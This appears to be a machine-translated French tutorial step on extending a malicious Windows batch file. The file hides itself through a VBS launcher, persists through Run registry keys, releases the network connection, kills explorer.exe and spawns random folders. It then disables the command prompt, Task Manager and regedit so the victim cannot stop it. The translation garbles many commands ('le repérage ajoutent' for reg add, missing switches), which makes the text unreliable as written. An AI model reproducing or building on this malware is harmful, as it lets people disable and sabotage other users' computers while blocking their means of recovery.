Étape 3: Ajout de plus dans le fichier de commandes
Actuellement le fichier batch devrait ressembler à ceci :hors
Goto traitement
CreateObject("Wscript.Shell"). Exécuter "" "& WScript.Arguments(0) &" "", 0, False
: processus
tapez run.bat | trouver « CreateObject » | trouver/v « type » > invis.vbs
CD %windir%\system32
l’écho de wscript.exe "C:\windows\system32\invis.vbs" "Data_exe.bat" > Data_exe.bat
echo off > Data.bat
l’écho d’ipconfig/release >> Data.bat
écho explorer.exe taskkill >> Data.bat
echo mkdir %% aléatoire %% >> Data.bat
echo mkdir %% aléatoire %% >> Data.bat
le repérage ajoutent « HKCU\software\microsoft\windows\currentversion\run » v sécurité t reg_sz /d « % windir%\system32\Data_exe.bat » f
le repérage ajoutent « HKLM\software\microsoft\windows\currentversion\run » v sécurité t reg_sz /d « % windir%\system32\Data_exet » f
Maintenant, nous allons ajouter un peu plus, vous pouvez le faire à où l’utilisateur a très peu moyen pour arrêter cela en interdisant tout simplement le plus couramment utilisé des méthodes de stopper des choses comme ça, comme le gestionnaire des tâches, invite de commande et regedit.
C’est assez simple à faire, il suffit d’ajouter les lignes suivantes dans le fichier de commandes :
le repérage ajoutent « HKLM\Software\Policies\Microsoft\Windows\System v DisableCMD /t REG_DWORD /d 2 f
le repérage ajoutent « HKCU\Software\Policies\Microsoft\Windows\System v DisableCMD /t REG_DWORD /d 2 f
le repérage AJOUTENT « HKLM v DisableTaskMgr /t REG_DWORD /d 1 f
le repérage ajoutent « HKCU v DisableTaskMgr /t REG_DWORD /d 1 f
le repérage AJOUTENT « HKLM v DisableRegistryTools /t REG_DWORD /d 1 f
le repérage ajoutent « HKCU v DisableRegistryTools /t REG_DWORD /d 1 f